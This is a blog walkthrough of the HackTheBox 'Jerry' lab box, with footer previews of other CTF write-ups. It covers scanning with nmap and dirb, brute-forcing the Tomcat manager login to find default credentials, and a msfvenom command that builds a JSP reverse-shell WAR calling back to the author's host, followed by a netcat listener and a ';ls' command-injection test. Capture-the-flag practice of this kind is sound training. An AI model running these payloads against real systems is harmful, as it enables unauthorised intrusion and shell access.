HTB JERRY Walkthrough

HackTheBox Jerry Walkthrough
Starting with knowing our IP (after connecting to the openvpn of HTB)
Command to know our IP - ifconfig



Now lets see what is the IP of the machine we are targeting (By just clicking the name of the machine in htb) . i am targeting machine named JERRY . IP(10.10.10.95)
Scanning Phase
nmap -A 10.10.10.95 -Pn
A - denotes aggressive scan
Pn - used for ping sweep
Nmap revealed http service active on port 8080 and also revealed tomcat

So i browsed IP on the web browser to see the web page (because http service is active )
Url - 10.10.10.95:8080
(Have to mention port because by default http service runs on 80 but in this case it’s 8080 so have to mention that)
Now fired up dirb to find the directories if any
Command : dirb http://10.10.10.95:8080
Results are shown below


One by one i managed to open the links but found nothing and at last i opened up the link i.e http://10.10.10.95:8080/manager
Prompted up with login panel of tomcat(as mentioned in nmap scans)
Click cancel so you’ll redirected to a page with an html file where you will get username and password .
The other way is to Bruteforce the panel with tomcat auxiliary.
Fired up msfconsole and searched for tomcat auxiliary
Command - search tomcat


Selected tomcat application manager login utility(see description of every result)
Command - use auxiliary/scanner/http/tomcat_mgr_login
Explored the requirements needed to run the scanner i.e rhosts
Fullfilled the requirements of the scanner.
Command - set rhosts 10.10.10.95
Rhost - victim IP
And run the scanner finally to start the bruteforce
Found uname as tomcat and pass as s3cret
Finally logged in with credentials


On scrolling i got option to deploy the war file ,so i can make war payload and deploy it for reverse connection
Payload generation with msfvenom
Msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.15.2 lport=1337 -f war > /root/Desktop/reverse.war
Uploaded the payload named reverse
Started netcat(swiss army knife) to listen on port 1337
And simultaneously clicked on the deployed payload i.e reverse and got the reverse connection.
(got shell of the machine)
Further explored the directories for flags and got two flags .
cd users>administrator>desktop>flags
I used more command to read the flags .
Command - more “filename” and submit the obtained flags in HTB .

Popular posts from this blog

Calculat3 M3 | CTF Learn

Image
This walkthrough will demonstrate the simple challenge based on command injection Calculat3 M3 This is the challenge page we got after visiting the given link. I provided random input in this calculator and intercepted the request with BurpSuite I got one parameter "expression" taking the values  Tried for command injection with ";ls" Forwarding the above request finally Got the Flag
Read more

TryHackme: Blue Walkthrough

Image
Task 1: Recon After we've connected to the tryhackme network the first task is to enumerate the target. We use Nmap for scanning the target IP. Command Used : nmap -sS -Pn <target-ip> -sS : Scan using TCP SYN scan -Pn : Treats all host as online --skip host discovery Next we used a command to find the vulnerability on the target machine. Command Used : nmap --script vuln <target-ip> --script : Specify the --script option to choose your own scripts to execute by providing categories , script file names, or the name of directories full of scripts you wish to execute. vuln : These scripts check for known vulnerabilites and generally only report results if they are found. Below, we see that nmap is indicating the target may be vulnerable to ms17-010(on the left0 and we can verify this using metasploit. To start Metasploit use command "msfconsole" We start by simply doing a search for ms17-010 Here we use module 2 i.e. exploit/windows
Read more

CTF - Dina : 1.0.1 walkthrough

Image
     Lab Environment  : Attacker’s Machine :  Linux kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2(2017-11-08) x86_64 GNU/Linux Vulnerable Machine : Dina: 1.0.1 Scanning phase route -n (To know the gateway) i.e 172.16.60.2 arp-scan --local (to know the devices connected to the local network)   Vulnerable machine IP : 172.16.60.154           Using nmap for scanning the IP : nmap -sS -sC -sV  172.16.60.154 We got one open port i.e 80 and http service is active Since the port 80 is open and http service is active then we can open the IP in browser.   Another nmap syntax to know vulnerability if any : nmap --script vuln 172.16.60.154 Now further using dirb for scanning the directories : dirb http://172.16.60.154 Some results are obtained after using dirb .  Opened the http://172.16.60.154/robots.txt and found something interesti
Read more